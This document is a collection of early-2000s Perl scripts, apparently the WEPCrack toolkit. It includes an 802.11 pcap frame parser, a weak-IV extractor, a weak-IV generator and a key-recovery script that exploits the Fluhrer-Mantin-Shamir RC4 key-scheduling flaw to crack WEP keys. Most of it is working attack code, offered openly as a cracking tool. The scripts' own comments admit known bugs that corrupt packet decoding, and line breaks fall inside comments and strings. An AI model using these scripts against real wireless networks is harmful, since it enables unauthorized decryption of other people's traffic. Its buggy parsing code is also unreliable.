#!/usr/bin/perl 
# output to script 
# Anton T. Rager - 08/17/2001 

# Known bugs : readtoend() is broken. 
Data packets with ff:ff:ff:ff will f-up the next few packets. Need to read pkt len and 
# seek to end 

$pcapfile=@ARGV[0]; 
if ($pcapfile) { 
        if (!-f $pcapfile) { 
                die("File not found
"); 
        } 
        open(INFILE, $pcapfile); 
} else { 
        open(INFILE, "-"); 
} 


# Look to see if valid pcap file and determine Endian-ness 
for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
        $pcapformat=$pcapformat . $inchar; 
} 
$pcap_hex=unpack('H*', $pcapformat); 
print("

Pcap Header : $pcap_hex
"); 

if ($pcap_hex eq "d4c3b2a1") { 
        print("Big Endian
"); 
        $big=1; 
} elsif ($pcap_hex eq "a1b2c3d4") { 
        print("Little Endian
"); 
        $big=0; 
} else { 
        die("Not Pcap?
"); 
} 

# Jump over rest of file header 
for ($i=0; $i<20; $i++) { 
        $inchar=getc(INFILE);  
} 

$caplen_val=unpack('V*', $caplen); 

# 1st 4 bytes: #MS 
# 2nd 4 bytes: #secs 
# 3rd 4 bytes: caplen 
# 4th 4 bytes: pktlen 
# use caplen value for readahead. 
$caplen=""; 
for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
} 
for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
} 
#Get actual captured pkt len 
for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
        $caplen=$caplen . $inchar; 
} 
for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
        $rptlen=$rptlen . $inchar; 
} 
# convert len from char to little endian long. 
if ($big) { 
        $caplen_val=unpack('V*', $caplen); 
               $rpt_val=unpack('V*', $rptlen); 
} else { 
        $caplen_val=unpack('N*', $caplen); 
} 
print("

next pkt capture length : $caplen_val, next pkt rpt length : $rpt_val
"); 


while (!eof(INFILE)) { 

        print("

802.11 Header:
"); 
        print("
	Frame CTRL: ");  
        $inchar=ord(getc(INFILE)); 
        $frametype=$inchar; 
        $inchar=ord(getc(INFILE)); 
        $flags=$inchar; 

        #print("
	Duration: "); 
        for ($i=0; $i<2; $i++) { 
                $inchar=ord(getc(INFILE)); 
        } 

        if ($frametype eq 0x80) { 
                print("
	Beacon Frame:
"); 
                &beacon(); 
        } elsif ($frametype eq 0x08) { 
                print("
	Data Frame:
"); 
                &dataframe(); 
        } elsif ($frametype eq 0x00) { 
                print("
	Association Request Frame:
"); 
                #&readtoend(); 
                &asn_req(); 
        } elsif ($frametype eq 0x10) { 
                print("
	Association Response Frame:
"); 
                &asn_rpl(); 
        } elsif ($frametype eq 0x40) { 
                print("
	Probe Request Frame:
"); 
                &probe_req(); 
        } elsif ($frametype eq 0x50) { 
                print("
	Probe Response Frame:
"); 
                &probe_rpl(); 
        } elsif ($frametype eq 0xb0) { 
                print("
	Authentication Frame:
"); 
                &auth(); 
        } elsif ($frametype eq 0xc0) { 
                print("
	DisAssociation Frame:
"); 
                &de_asn (); 
        } elsif ($frametype eq 0xd4) { 
                print("
	ACK Frame - Skipping
"); 
                &readtoend($caplen_val-5); 
                # ACK frame : no src, dst, bssid fields. 
                # ACK frame =  Type, flags, duration [2 bytes], rcv addr [6 bytes]  
        } else { 
                print("
	Other Frame - Skipping
"); 
                &readtoend($caplen_val-5); 
                # RTS - 0xb4 
                # ReAssociation Request -
                # DeAuth -
        } 


        # jump to next record 
#        for ($i=0; $i<16; $i++) { 
#                $inchar=ord(getc(INFILE)); 
#        } 

        # 1st 4 bytes: #MS 
        # 2nd 4 bytes: #secs 
        # 3rd 4 bytes: caplen 
        # 4th 4 bytes: pktlen 
        # use caplen value for readahead. 
        $caplen=""; 
        $rptlen=""; 
        for ($i=0; $i<4; $i++) { 
                $inchar=getc(INFILE); 
        } 
        for ($i=0; $i<4; $i++) { 
                $inchar=getc(INFILE); 
        } 
        for ($i=0; $i<4; $i++) { 
                $inchar=getc(INFILE); 
                $caplen=$caplen . $inchar; 
        } 
        for ($i=0; $i<4; $i++) { 
                $inchar=getc(INFILE); 
                $rptlen=$rptlen . $inchar; 
        } 

        if ($big) { 
                $caplen_val=unpack('V*', $caplen); 
                $rpt_val=unpack('V*', $rptlen); 
        } else { 
                $caplen_val=unpack('N*', $caplen);  
        } 
        print("

next pkt capture length : 
    $caplen_val, next pkt rpt length : $rpt_val
"); 


    } 
    exit; 



    sub beacon() { 

        &gen_header(); 

        print("
Fixed Parameters:
"); 
        for ($i=0; $i<10; $i++) { 
            $inchar=ord(getc(INFILE)); 
            printf("%02x", $inchar); 
        } 

        print("
	Capability Flags: "); 
        for ($i=0; $i<2; $i++) { 
            $inchar=ord(getc(INFILE)); 
            printf("%02x", $inchar); 
        } 

        &tagparms(); 

    } 


    sub dataframe(){ 

        &gen_header(); 

        # ----- Start Reading Data: 
    WEP 1st 3bytes IV, 4th should be 0, 5th should 1st encr output 
        print("
IV: "); 
        for ($x=0; $x<3; $x++) { 
            $inchar=ord(getc(INFILE)); 
            printf("%02x", $inchar);  
    } 
    print("
IV Options: "); 
    $inchar=ord(getc(INFILE)); 
    printf("%02x", $inchar); 

    print("
Encr Byte1: "); 

    $inchar=ord(getc(INFILE)); 
    printf("%02x", $inchar); 

    #read to end of record [ff-ff-ff-ff -- then, 
read next record [jump ahead 16bytes?] 
    &readtoend($caplen_val-30); 
} 


sub asn_req () { 

    &gen_header(); 

    # fixed : capability [2B], Listen Int[2B] 
    print("
	Capability Flags: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	Listen Interval: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 

    &tagparms(); 
} 

sub asn_rpl () { 

    &gen_header(); 

    # fixed : capability [2B], Status Code [2B], Association ID [2B] 
    print("
	Capability Flags: ");  
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	Status Code: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	Association ID: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    &tagparms(); 
} 

sub probe_req () { 
    &gen_header(); 
    &tagparms(); 
} 

sub probe_rpl () { 
    &gen_header(); 

    # fixed : timestamp [8B], beacon int [2B], capability [2B] 
    print("
Fixed Parameters:
"); 
    for ($i=0; $i<10; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 

    print("
	Capability Flags: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 

    &tagparms(); 
}  
sub auth () { 

    &gen_header(); 

    # fixed : Auth ALG [2B], Auth Seq [2B], Status Code [2B] 
    print("
	Auth ALG: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	Auth Seq: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	Status Code: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 

    for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
        #printf("%02x", $inchar); 
    } 

} 

sub de_asn () { 
    &gen_header(); 
    #fixed : Reason Code [2B] 
    print("
	Reason Code: "); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    for ($i=0; $i<4; $i++) { 
        $inchar=getc(INFILE); 
        #printf("%02x", $inchar); 
    } 
}  
sub gen_header() { 

    print("
	Dest Addr: "); 
    for ($i=0; $i<6; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	Src Addr: "); 
    for ($i=0; $i<6; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
    print("
	BSSID Addr: "); 
    for ($i=0; $i<6; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 

    print("
"); 
    for ($i=0; $i<2; $i++) { 
        $inchar=ord(getc(INFILE)); 
        printf("%02x", $inchar); 
    } 
} 

sub readtoend { 

    # Nasty kludge to read to end of frame. 
End of frame is FF:FF:FF:FF.  Review 802.11 spec for better method 
    # doesn't always work -- if data packet has FF:FF:FF:FF 
in it, next few decodes are f'd up. 
        my @passed = @_; 

    print("Passed val : $passed[0]
"); 
#    $endpkt=0; 

    for ($i=0; $i<$passed[0]+1; $i++) { 
        $inchar=getc(INFILE); 

    } 
#    while (!$endpkt) {  
#        $inchar=ord(getc(INFILE)); 
#        if ($inchar eq 255) { 
#            $inchar=ord(getc(INFILE)); 
#            if ($inchar eq 255) { 
#                $inchar=ord(getc(INFILE)); 
#                if ($inchar eq 255) { 
#                    $inchar=ord(getc(INFILE)); 
#                    if ($inchar eq 255) { 
#                        $endpkt=1; 
#                    } 
#                } 
#            } 
#        } 
#    } 
} 

sub tagparms() { 

    print("
Tagged Parameters: "); 
    $endpkt=0; 
    while (!$endpkt) { 
        $inchar=ord(getc(INFILE)); 
        if ($inchar eq 0x00) { 
            print("
	SSID: "); 
            $inchar=ord(getc(INFILE)); 
            $numchars=$inchar; 
            for ($x=0; $x < $numchars; $x++) { 
                $inchar=getc(INFILE); 
                print("$inchar"); 
            } 
        } 
        elsif ($inchar eq 0x01) { 
            print("
	Supported Rates: "); 
            $inchar=ord(getc(INFILE)); 
            $numchars=$inchar; 
            for ($x=0; $x < $numchars; $x++) { 
                $inchar=ord(getc(INFILE)); 
                printf("%02x", $inchar); 
            } 
        } 
        elsif ($inchar eq 0x03) {  
            print("
	Channel: "); 
            $inchar=ord(getc(INFILE)); 
            $numchars=$inchar; 
            for ($x=0; $x < $numchars; $x++) { 
                $inchar=ord(getc(INFILE)); 
                printf("%02x", $inchar); 
            } 

        } 
        elsif ($inchar eq 0xff) { 
            print("
	End Marker: "); 
            $inchar=ord(getc(INFILE)); 
            $numchars=$inchar; 
            if ($numchars eq 255) { 
                $numchars=2; 
                $endpkt=1; 
            } 
            for ($x=0; $x < 2; $x++) { 
                $inchar=ord(getc(INFILE)); 
                printf("%02x", $inchar); 
            } 
        } else { 
            print("
	Unknown Tag: "); 
            $inchar=ord(getc(INFILE)); 
            $numchars=$inchar; 
            for ($x=0; $x < $numchars; $x++) { 
                $inchar=ord(getc(INFILE)); 
                printf("%02x", $inchar); 
            } 
        } 
    } 
    print("
"); 

}
				

#!/usr/bin/perl 

# prism-getIV.pl 
# Anton T. Rager - 08/17/2001 


$pcapfile=@ARGV[0]; 
if ($pcapfile) { 
    if (!-f $pcapfile) { 
        die("File not found
"); 
    } 
    open(INFILE, $pcapfile); 
} else { 
    open(INFILE, "-"); 
} 

#open(LSBFILE, ">LSB-IVFile.log"); 
open(MSBFILE,">IVFile.log"); 
#open(FULLFILE,">LSB-IVpayload.log" ); 

# hardcoded fo 40bit WEP 
print(MSBFILE "5
"); 

# 128bit WEP 
#print(MSBFILE "13
"); 

# Jump over header 
for ($i=0; $i<40; $i++) { 
    $inchar=ord(getc(INFILE)); 
} 

while (!eof(INFILE)) { 

#print("

802.11 Header:
"); 
#print("
	Frame CTRL: "); 

$inchar=ord(getc(INFILE)); 
#printf("%02x", $inchar); 
$frametype=$inchar; 
$inchar=ord(getc(INFILE)); 
#printf("%02x", $inchar);  
$flags=$inchar; 

#print("
	Duration: "); 
for ($i=0; $i<2; $i++) { 
    $inchar=ord(getc(INFILE)); 
#    printf("%02x", $inchar); 
} 


if ($frametype eq 0x08) { 
#    print("
	Data Frame:
"); 
    &dataframe(); 


} else { 
#    print("
	Other Frame - Skipping
"); 
    #read to end of record [ff-ff-ff-ff -- then, 
read next record [jump ahead 16bytes?] 
    $endpkt=0; 
    while (!$endpkt) { 
        $inchar=ord(getc(INFILE)); 
        if ($inchar eq 255) { 
            $inchar=ord(getc(INFILE)); 
            if ($inchar eq 255) { 
                $inchar=ord(getc(INFILE)); 
                if ($inchar eq 255) { 
                    $inchar=ord(getc(INFILE)); 
                    if ($inchar eq 255) { 
                        $endpkt=1; 
                    } 
                } 
            } 
        } 
    } 


} 


    # jump to next record 
    for ($i=0; $i<16; $i++) {  
    $inchar=ord(getc(INFILE)); 
    } 

} 

close(INFILE); 
close(MSBFILE); 
close(LSBFILE); 
close(FULLFILE); 

exit; 


sub dataframe(){ 

#If ctrl = data 



#print("
	Dest Addr: "); 
for ($i=0; $i<6; $i++) { 
    $inchar=ord(getc(INFILE)); 
#    printf("%02x", $inchar); 
} 
#print("
	Src Addr: "); 
for ($i=0; $i<6; $i++) { 
    $inchar=ord(getc(INFILE)); 
#    printf("%02x", $inchar); 
} 
#print("
	BSSID Addr: "); 
for ($i=0; $i<6; $i++) { 
    $inchar=ord(getc(INFILE)); 
#    printf("%02x", $inchar); 
} 

#print("
"); 
for ($i=0; $i<2; $i++) { 

$inchar=ord(getc(INFILE)); 
#printf("%02x", $inchar);  
#print("$inchar-"); 
} 

# ----- Start Reading Data: WEP 1st 3bytes IV, 4th should be 0, 
5th should 1st encr output 
#print("
IV: "); 
for ($x=0; $x<3; $x++) { 
    $inchar=ord(getc(INFILE)); 
    $IVList[$x]=$inchar; 
#    print("$inchar-"); 
} 

#print("
IV Options: "); 
$inchar=ord(getc(INFILE)); 
#printf("%02x", $inchar); 

#print("
Encr Byte1: "); 

$inchar=ord(getc(INFILE)); 
$onebyte=$inchar; 
#printf("%02x", $inchar); 


if ($IVList[0] > 2 && $IVList[0] < 14 && $IVList[1] eq 255) { 
    print("	
Match normal order [MSB]: 
$IVList[0] $IVList[1] $IVList[2] $onebyte
"); 
    print(MSBFILE "$IVList[0] $IVList[1] $IVList[2] $onebyte
"); 
    #print("	
Match normal order: $IVList[0] $IVList[1] $IVList[2]
"); 


#} elsif ($IVList[2] > 2 && $IVList[2] < 14 && $IVList[1] eq 255) { 
#    print("	
Match reverse order [LSB]: 
$IVList[2] $IVList[1] $IVList[0] $onebyte
"); 
#    print(LSBFILE "$IVList[2] $IVList[1] $IVList[0] $onebyte
"); 
} 

#read to end of record [kludge: look for ff-ff-ff-ff – 
then, read next record [jump ahead 16bytes?] 
$endpkt=0; 
while (!$endpkt) { 
    $inchar=ord(getc(INFILE)); 
    if ($inchar eq 255) {  
        $inchar=ord(getc(INFILE)); 
        if ($inchar eq 255) { 
            $inchar=ord(getc(INFILE)); 
            if ($inchar eq 255) { 
                $inchar=ord(getc(INFILE)); 
                if ($inchar eq 255) { 
                    $endpkt=1; 
                } 
            } 
        } 
    } 
} 

# ---------------------------------


} 




#close(INFILE); 

#!/usr/bin/perl 

# By : Anton T. Rager - 08/09/2001-08/12/2001 
#      [email protected] 

$findhost=@ARGV[0]; 
if (!$findhost) {  
    print("Usage:  WeakIVGen.pl <Key1:Key2:Key3:Key4:Key5...Keyn>

Where 
Keyx is key byte in decimal
And : is delimiter for each byte [40bit=5bytes,
 128bit=11bytes]
"); 
    exit; 
} 


$i=0; 
$j=0; 
$ik=0; 
$x=0; 

@inkey=split(":", @ARGV[0]); 

@IV = (3, 255, 0); 

# 802.2 SNAP Header should be 1st plaintext byte of WEP packet 
@text = (0xaa); 

# Keysize 11 byte or 5 byte 
$keysize=scalar(@inkey); 
$bitsize=$keysize*8; 

print("Keysize = $keysize[$bitsize bits]
"); 

open(OUTFILE, ">IVFile.log"); 

print("$keysize
"); 
print(OUTFILE "$keysize
"); 

$keylen = $keysize+3; 

for ($B=0; $B < $keysize; $B++) { 
    #print("$B
"); 



    for ($loop1=0; $loop1 < 256 ; $loop1++) { 
        $IV[2]=$loop1; 
    #  for ($loop2=0; $loop2 < 10; $loop2++) { 
        $IV[0]=$B+3; 
    #    $IV[0]=$loop2;  
                for ($i=0; $i < $keylen; $i++) { 
            if ($i < 3) { 
                $Key[$i]=$IV[$i]; 
            } else { 
                $Key[$i]=$inkey[$i-3]; 
            } 
        } 


        $i=0; 
        $j=0; 
        $ik=0; 

        for ($i=0; $i<256; $i++) { 
            $S[$i]=$i; 
            if ($ik > $keylen-1) { 
                $ik=0; 
            } 
            $Key[$i]=$Key[$ik]; 
            $ik++; 
        } 

        for ($i=0; $i<256; $i++) { 
            $j=($j+$S[$i]+$Key[$i]) % 256; 
            $temp = $S[$i]; 
            $S[$i] = $S[$j]; 
            $S[$j] = $temp; 
        } 

        # 1 byte thru PRGA 
        $i=0; 
        $j=0; 
        $i=($i+1) % 256; 
        $j=($j + $S[$i]) % 256; 
        $temp=$S[$i]; 
        $S[$i]=$S[$j]; 
        $S[$j]=$temp; 
        $t=($S[$i]+$S[$j]) % 256; 
        $K=$S[$t]; 
        $encr=$text[0] ^ $K; 
        $S3Calc = $text[0] ^ $encr;  
        print("$IV[0] $IV[1] $IV[2] $encr
"); 
        print(OUTFILE "$IV[0] $IV[1] $IV[2] $encr
"); 



    } 

} 
print("
"); 
close(OUTFILE); 




WEPCrack.PL 

#!/usr/bin/perl 

# Basic WEP/RC4 crack tool that demonstrates the key scheduling 
weaknesses described in the paper 
# "Weakness in the Key Scheduling Algorithm of RC4" by Scott 
Fluhrer, Itsik Mantin, and Adi Shamir. 
# 
# script relies on existance of file with list of IVs and 1st 
encrypted output byte to produce the 
# secret key originally used to encrypt the list of IVs. 
Another script [WeakIVGen.pl] is included to 
# produce weak IVs and the encrypted output byte for this script to use. 
# 
# By : Anton T. Rager - 08/09/2001-08/12/2001 
#      [email protected] 


$i=0; 
$j=0; 
$ik=0; 
$x=0; 


# 802.2 SNAP Header should be 1st plaintext byte of WEP packet 
@text = (0xaa);  
if (!-f "IVFile.log") { 
    die("Error :
No IVFile.log file found - run 
WeakIVGen.pl 1st to generate file
"); 
} 
# Keysize 11 byte or 5 byte 
open (IVFILE, "IVFile.log"); 
@IVList=<IVFILE>; 
close (IVFILE); 

$keysize=$IVList[0]; 
chomp($keysize); 
splice(@IVList, 0, 1); 

$bitsize=$keysize*8; 
print("Keysize = $keysize [$bitsize bits]
"); 


for ($B=0; $B < $keysize; $B++) { 

    # Init statistics array 
    for ($i=0; $i < 256; $i++) { 
        $stat[$i]=0; 
    } 

    foreach $IVRec (@IVList) { 

        @IV=split(" ",$IVRec); 
        $key[0]=$IV[0]; 
        $key[1]=$IV[1]; 
        $key[2]=$IV[2]; 
            $encr=$IV[3]; 

        if ($key[0] eq $B+3) { 




# Look for matching IV for 1st Key byte 

            $i=0; 
            $j=0;  
            $ik=0; 

            for ($i=0; $i<256; $i++) { 
                $S[$i]=$i; 

            } 

            # 0 to 3+K[b] 
            for ($i=0; $i< $B + 3; $i++) { 
                $j=($j+$S[$i]+$key[$i]) % 256; 
                $temp = $S[$i]; 
                $S[$i] = $S[$j]; 
                $S[$j] = $temp; 
                if ($i eq 1) { 
                    $S1[0]=$S[0]; 
                    $S1[1]=$S[1]; 
                } 

            } 


            $X=$S[1]; 
            if ($X < $B + 3) { 
                if ($X+$S[$X] eq $B + 3) { 
                             if ($S[0] ne $S1[0] || $S[1] ne $S1[1]) { 
                        #print("Throwaway IV $IV[0], $IV[1], $IV[2]
"); 
                    } 

# Xor inbyte and outbyte to get S[3] 
# plugin S[3] as J and subtract (5+x+S[3]) to get K 
                        $S3Calc = $encr ^ $text[0]; 
                    $leaker = $S3Calc-$j-$S[$i] %256; 
                    $stat[$leaker]++; 
#                    $match++; 

#                    if($match >99) { 
#                        print("100 matches 
collected in $counter tries
"); 
#                        exit; 
#                    } 
                }  
            } 



    $max=0; 
    $count=0; 
    foreach $rank (@stat) { 
        if ($rank > $max) { 
            $max=$rank; 
            $winner=$count; 
        } 
        $count++; 
    } 
    } 
    } 
    print("$winner "); 
    push (@key, $winner); 
} 
print("
");